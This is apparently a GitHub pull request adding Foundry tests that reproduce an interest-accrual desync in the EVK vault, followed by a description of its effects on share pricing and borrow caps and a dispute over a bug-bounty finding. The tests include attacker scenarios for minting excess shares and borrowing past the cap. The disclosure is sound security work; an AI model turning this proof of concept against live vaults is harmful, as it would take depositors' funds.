### PR TITLE
Repro: interest accrual desync (interestAccumulator advances while totalBorrows stays stale) 

### DIFF
--- a/test/unit/evault/shared/InterestAccrualDesync.t.sol
+++ b/test/unit/evault/shared/InterestAccrualDesync.t.sol
@@ -1,0 +1,155 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity ^0.8.13;
+
+import {EVaultTestBase} from "test/unit/evault/EVaultTestBase.t.sol";
+import {IRMMax} from "test/mocks/IRMMax.sol";
+import "src/EVault/shared/Constants.sol";
+
+/// @dev Reproducer for a non-atomic interest accrual path in `Cache.initVaultCache()`:
+/// `interestAccumulator` can update while `totalBorrows` stays stale if the 256-bit intermediate multiplication
+/// `newTotalBorrows * newInterestAccumulator` overflows. This breaks invariants and affects share pricing and caps.
+///
+/// NOTE: These tests are expected to FAIL on current master to demonstrate the issue.
+contract VaultTest_InterestAccrualDesync_Invariants is EVaultTestBase {
+    uint256 internal constant VIRTUAL_DEPOSIT_AMOUNT = 1e6;
+
+    address depositor;
+    address borrower;
+    address attacker;
+
+    function _encodeAmountCap(uint256 cap) internal pure returns (uint16 raw) {
+        // AmountCap is a 16-bit decimal floating point:
+        // exponent = low 6 bits, mantissa = high 10 bits, scaled by 100.
+        // resolve(raw) = 10**exp * mantissa / 100
+        if (cap == type(uint256).max) return 0;
+        require(cap > 0, "cap=0 unsupported; use raw=0 for unlimited");
+
+        for (uint256 exp = 0; exp <= 63; ++exp) {
+            uint256 denom = 10 ** exp;
+            uint256 mantissa = (cap * 100 + denom - 1) / denom; // ceil
+            if (mantissa == 0) continue;
+            if (mantissa <= 1023) {
+                raw = uint16((mantissa << 6) | exp);
+                return raw;
+            }
+        }
+
+        revert("cap too large to encode");
+    }
+
+    function setUp() public override {
+        super.setUp();
+
+        depositor = makeAddr("depositor");
+        borrower = makeAddr("borrower");
+        attacker = makeAddr("attacker");
+
+        oracle.setPrice(address(assetTST), unitOfAccount, 1e18);
+        oracle.setPrice(address(eTST2), unitOfAccount, 2e18);
+
+        startHoax(address(this));
+        eTST.setLTV(address(eTST2), 0.9e4, 0.9e4, 0);
+        eTST.setInterestRateModel(address(new IRMMax()));
+
+        // Large, but within MAX_SANE_AMOUNT.
+        uint256 seedCash = 2e30;
+        uint256 seedCollateral = 3e30;
+
+        startHoax(depositor);
+        assetTST.mint(depositor, seedCash);
+        assetTST.approve(address(eTST), type(uint256).max);
+        eTST.deposit(seedCash, depositor);
+
+        startHoax(borrower);
+        assetTST2.mint(borrower, seedCollateral);
+        assetTST2.approve(address(eTST2), type(uint256).max);
+        eTST2.deposit(seedCollateral, borrower);
+        evc.enableCollateral(borrower, address(eTST2));
+        evc.enableController(borrower, address(eTST));
+
+        // Chosen to keep debt encodable for a few years at MAX interest while allowing
+        // `totalBorrows * interestAccumulator` to approach 2^256.
+        eTST.borrow(1e25, borrower);
+
+        // Prime interestRate to MAX in storage.
+        eTST.touch();
+    }
+
+    function _reachMismatchState() internal {
+        for (uint256 yearCount = 1; yearCount <= 6; ++yearCount) {
+            skip(SECONDS_PER_YEAR);
+            eTST.touch();
+
+            // 1-second accrual step where the intermediate multiplication is most likely to overflow
+            // (large `totalBorrows` and `interestAccumulator`, but multiplier close to 1e27).
+            skip(1);
+            eTST.touch();
+
+            if (eTST.debtOfExact(borrower) > eTST.totalBorrowsExact()) return;
+        }
+
+        revert("did not reach mismatch state within 6 years");
+    }
+
+    function test_invariant_totalBorrowsExact_should_not_lag_debtOfExact() public {
+        _reachMismatchState();
+
+        // Expected invariant: global total borrows should be >= any single account's exact debt.
+        // Demonstration: currently violated once the mismatch state is reached.
+        assertGe(eTST.totalBorrowsExact(), eTST.debtOfExact(borrower));
+    }
+
+    function test_invariant_deposit_should_not_mint_more_than_honest_totalDebt() public {
+        _reachMismatchState();
+
+        uint256 reportedBorrows = eTST.totalBorrows();
+        uint256 trueDebt = eTST.debtOf(borrower);
+        uint256 cash = eTST.cash();
+        uint256 totalShares = eTST.totalSupply();
+
+        assertGt(trueDebt, reportedBorrows);
+
+        uint256 depositAssets = 1e24;
+        uint256 conversionShares = totalShares + VIRTUAL_DEPOSIT_AMOUNT;
+        uint256 expectedSharesIfHonest =
+            depositAssets * conversionShares / (cash + trueDebt + VIRTUAL_DEPOSIT_AMOUNT);
+
+        startHoax(attacker);
+        assetTST.mint(attacker, depositAssets);
+        assetTST.approve(address(eTST), type(uint256).max);
+        uint256 mintedShares = eTST.deposit(depositAssets, attacker);
+
+        // Expected invariant: deposit minting should not be more generous than using honest total debt.
+        assertLe(mintedShares, expectedSharesIfHonest);
+    }
+
+    function test_invariant_borrowCap_should_prevent_borrow_at_cap() public {
+        _reachMismatchState();
+
+        uint256 reportedBorrows = eTST.totalBorrows();
+        uint256 honestBorrowsVictim = eTST.debtOf(borrower);
+        assertGt(honestBorrowsVictim, reportedBorrows);
+
+        uint256 capAssets = honestBorrowsVictim;
+        uint256 gap = honestBorrowsVictim - reportedBorrows;
+
+        startHoax(address(this));
+        eTST.setCaps(0, _encodeAmountCap(capAssets));
+
+        address attackerBorrower = makeAddr("attackerBorrower");
+        startHoax(attackerBorrower);
+        assetTST2.mint(attackerBorrower, 3e30);
+        assetTST2.approve(address(eTST2), type(uint256).max);
+        eTST2.deposit(3e30, attackerBorrower);
+        evc.enableCollateral(attackerBorrower, address(eTST2));
+        evc.enableController(attackerBorrower, address(eTST));
+
+        uint256 cashBefore = eTST.cash();
+        eTST.borrow(gap, attackerBorrower);
+        uint256 cashAfter = eTST.cash();
+
+        // Expected invariant: borrowing exactly at the cap should be blocked (no cash should leave the vault).
+        assertEq(cashAfter, cashBefore);
+    }
+}
+


### PR DESCRIPTION
### Summary

This PR adds a minimal Foundry reproducer that demonstrates a non-atomic interest accrual state in EVK where `interestAccumulator` advances but `totalBorrows` can remain stale when a 256-bit intermediate multiplication overflows during the total-borrows rescale step.

**No production code is changed in this PR. It is a repro-only submission.**

### What this PR changes

- Adds `test/unit/evault/shared/InterestAccrualDesync.t.sol`

These tests are intentionally written as “expected invariants”. On current master, they fail once the mismatch state is reached.

### The behavior being demonstrated

In `src/EVault/shared/Cache.sol` (`Cache.initVaultCache()`), interest accrual updates `interestAccumulator` and also attempts to rescale `totalBorrows`. The rescale uses a checked 256-bit intermediate multiplication:

1. `intermediate = newTotalBorrows * newInterestAccumulator`
2. If the multiplication overflows, the check fails and `newTotalBorrows` is left unchanged.
3. The function can still persist the newer `interestAccumulator`.

Once this happens, the system can reach a state where:

$$debtOfExact(borrower) > totalBorrowsExact()$$

This is not a rounding artifact; it is a strict invariant break caused by a skipped global-borrows update while the accumulator advanced.

### Why this matters (downstream)

When `totalBorrows` is underreported while the accumulator is up to date:

- **Share pricing / totalAssets**: Can be computed using an underreported `totalBorrows` ($cash + totalBorrows$), leading to mispriced share minting.
- **Borrow-cap enforcement**: Can be checked against an underreported global borrows value (`RiskManager.checkVaultStatus()` uses `vaultCache.totalBorrows`), allowing borrowing that should be blocked at the configured cap.

The included test file contains three failing invariants demonstrating these effects.

### How to reproduce

Run:
`forge test --match-contract VaultTest_InterestAccrualDesync_Invariants -vv --ast`

**Expected result on current master:**
- At least one test fails after the mismatch state is reached.

### Not covered by “Interest Overflows” in the whitepaper

The whitepaper’s “Interest Overflows” section describes overflow in `rpow` / accumulator update and states the accumulator stops growing (and resets to the last-interaction value). That is a different failure mode.

This PR demonstrates a different overflow path: the accumulator update succeeds and advances, while `totalBorrows` rescale can be skipped due to overflow in the intermediate multiplication used for rescaling global borrows. That desync behavior (and its implications for pricing/caps) is not described by the “accumulator stops growing” degradation path.

### Process note (Cantina)

This reproducer corresponds to Cantina finding **#344**. During the dispute process on Feb 17, 2026, the finding was marked as “Spam” and locked, preventing further technical discussion. (Screenshot attached in this PR description.)

### Request

Please either:

1. Treat this as a bug and fix the non-atomic accrual (so `interestAccumulator` cannot advance without consistent `totalBorrows` rescaling), or
2. Explicitly document this specific desync failure mode and its implications, and provide a verifiable unreachability argument under supported/allowed vault configurations.

**Reference PoC bundle (full context):** https://gist.github.com/Alpha-Guardian/574234fbc714f7ce1692e9124ab137d6

LOOK THAT！HAHA。
<img width="2303" height="8960" alt="image" src="https://github.com/user-attachments/assets/ee0e518a-5fd8-4bdb-b4a9-5241010e1966" />
